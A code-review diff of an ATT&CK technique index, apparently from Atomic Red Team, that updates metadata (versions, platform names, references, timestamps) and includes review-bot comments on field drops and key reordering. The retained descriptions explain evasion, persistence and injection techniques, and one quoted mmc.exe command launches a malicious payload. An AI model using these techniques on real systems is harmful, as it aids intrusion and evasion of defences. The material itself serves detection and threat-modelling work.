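Review bot: T1564.001 ends up with neither `spec_version` nor `x_mitre_attack_spec_version` (`- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are both removed and nothing is added), whereas techniques that carry `x_mitre_attack_spec_version: 2.1.0` elsewhere in the object, such as T1480.001 and T1216 below, keep it. If the intent is only to strip `spec_version`, this looks like the trailing `x_mitre_attack_spec_version` line is being taken along with it; check that the new source object for T1564.001 really lacks the field before merging. The same double drop happens for T1556.004, T1601.002, T1564.010, T1574.012, T1055.011 and T1548.003.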
@@ -13685,6 +13936,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13693,20 +13947,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
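Review bot: the T1578.001 `external_references`, `id`, `type`, `created`, `created_by_ref`, `object_marking_refs`, platform and domain keys removed in the previous hunk are all re-added here in a different order (and the references themselves are reordered, with AWS CloudTrail now ahead of Mandiant), so most of the roughly fifty changed lines are a key-order shuffle rather than a content change. The real changes are easy to miss: `x_mitre_version` 1.1 to 1.2, `revoked: false` added, `x_mitre_permissions_required: User` dropped, the Mandiant URL moved from `content.fireeye.com/m-trends/rpt-m-trends-2020` to `www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, and `x_mitre_attack_spec_version` 2.1.0 to 3.2.0. Consider emitting keys in a fixed (sorted) order when dumping so that future refreshes diff on content only.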
@@ -13763,6 +14048,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
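Review bot: `Office 365`, `Google Workspace` and `Azure AD` disappear from `x_mitre_platforms` for T1550.001 in favour of `Office Suite` and `Identity Provider` (the same rename hits T1078.004 and T1556 below). Any code or index that selects techniques by the old platform strings will silently return nothing for these techniques after this change, so the platform-keyed consumers should be updated in the same PR, or the PR description should point at the follow-up that does it.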
@@ -13838,11 +14123,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -13891,13 +14177,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -13991,7 +14274,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14013,11 +14296,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14084,8 +14366,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14103,7 +14385,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14206,12 +14487,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14224,6 +14504,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14260,17 +14541,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14316,9 +14597,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14356,7 +14634,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14375,7 +14653,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14406,7 +14683,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14430,12 +14707,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14519,7 +14794,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14541,7 +14815,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14575,12 +14849,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14632,9 +14904,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14703,7 +14974,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14750,7 +15020,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14763,12 +15033,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
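Review bot: T1127 gains two data sources here (`Module: Module Load`, `Process: Process Metadata`) while its `modified` in the same object goes from `2022-05-24T14:00:00.188Z` back to `2022-05-05T05:00:37.443Z` and `x_mitre_attack_spec_version` stays at 2.1.0. New content on an object whose timestamp gets older is contradictory unless the old timestamp was never the object's real edit time; please state which source bundle produced this so the combination is explainable rather than a sign of two object revisions being merged.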
@@ -14847,7 +15118,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14869,7 +15140,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -14912,7 +15182,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14936,8 +15206,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -14985,7 +15253,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15023,8 +15291,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15073,7 +15339,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15125,29 +15391,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
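Review bot: the rewritten T1053.005 description drops the paragraph on the deprecated `at` utility and its link to T1053.002, and adds the `Invoke-CimMethod` / `PS_ScheduledTask` sentence cited to `Red Canary - Atomic Red Team`, i.e. to this repository's own `atomics/T1053.005/T1053.005.md`, while the technique's `atomic_tests` entry in this file stays `[]`. Both are upstream ATT&CK edits, so mirroring them is correct, but the self-citation next to an empty test list deserves a sentence in the PR description so nobody reads it as tests having been lost in the regeneration.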
@@ -15194,7 +15459,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15226,8 +15491,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15241,6 +15506,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -15253,11 +15522,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15323,7 +15595,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15412,7 +15683,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15500,7 +15770,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15585,7 +15854,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15617,7 +15885,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15640,11 +15908,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15702,14 +15969,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
